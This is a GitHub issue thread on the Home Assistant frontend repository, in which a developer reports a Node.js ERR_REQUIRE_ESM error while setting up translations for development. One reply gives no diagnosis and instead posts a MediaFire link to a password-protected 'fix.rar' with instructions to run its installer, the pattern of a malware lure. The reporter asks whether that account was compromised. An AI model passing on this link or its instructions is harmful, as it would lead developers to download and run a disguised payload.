### ISSUE TITLE
unable to build frontend: Error [ERR_REQUIRE_ESM]: require() of ES Module is not supprted

### ISSUE THREAD

**Issue by OlJohnny** [home-assistant/frontend#21797]
### Checklist

- [X] I have updated to the latest available Home Assistant version.
- [X] I have cleared the cache of my browser.
- [X] I have tried a different browser to see if it is related to my browser.
- [X] I have tried reproducing the issue in [safe mode](https://www.home-assistant.io/blog/2023/11/01/release-202311/#restarting-into-safe-mode) to rule out problems with unsupported custom resources.

### Describe the issue you are experiencing

i am trying to setup this repsitory for developing.
after following the documentation [here](https://developers.home-assistant.io/docs/frontend/development/), i get the following error during the step <code>script/setup_translations</code>:

<pre>/home/johnny/git_local/frontend/node_modules/string-width/index.js:2
const stripAnsi = require('strip-ansi');
                  ^

Error [ERR_REQUIRE_ESM]: require() of ES Module /home/johnny/git_local/frontend/node_modules/strip-ansi/index.js from /home/johnny/git_local/frontend/node_modules/string-width/index.js not supported.
Instead change the require of /home/johnny/git_local/frontend/node_modules/strip-ansi/index.js in /home/johnny/git_local/frontend/node_modules/string-width/index.js to a dynamic import() which is available in all CommonJS modules.
    at Object.<anonymous> (/home/johnny/git_local/frontend/node_modules/string-width/index.js:2:19) {
  code: 'ERR_REQUIRE_ESM'
}

Node.js v20.17.0</pre>

nvm version: <code>0.39.3</code>
node version: <code>v20.17.0</code>
npm version: <code>10.8.2</code>
yarn version: <code>4.4.0</code>

### Describe the behavior you expected

error while building

### Steps to reproduce the issue

see above

### What version of Home Assistant Core has the issue?

-

### What was the last working version of Home Assistant Core?

-

### In which browser are you experiencing the issue with?

-

### Which operating system are you using to run this browser?

-

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by OlJohnny** [comment]
> Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."

bro what

**Comment by OlJohnny** [comment]
@Saschl your account got pwnd?
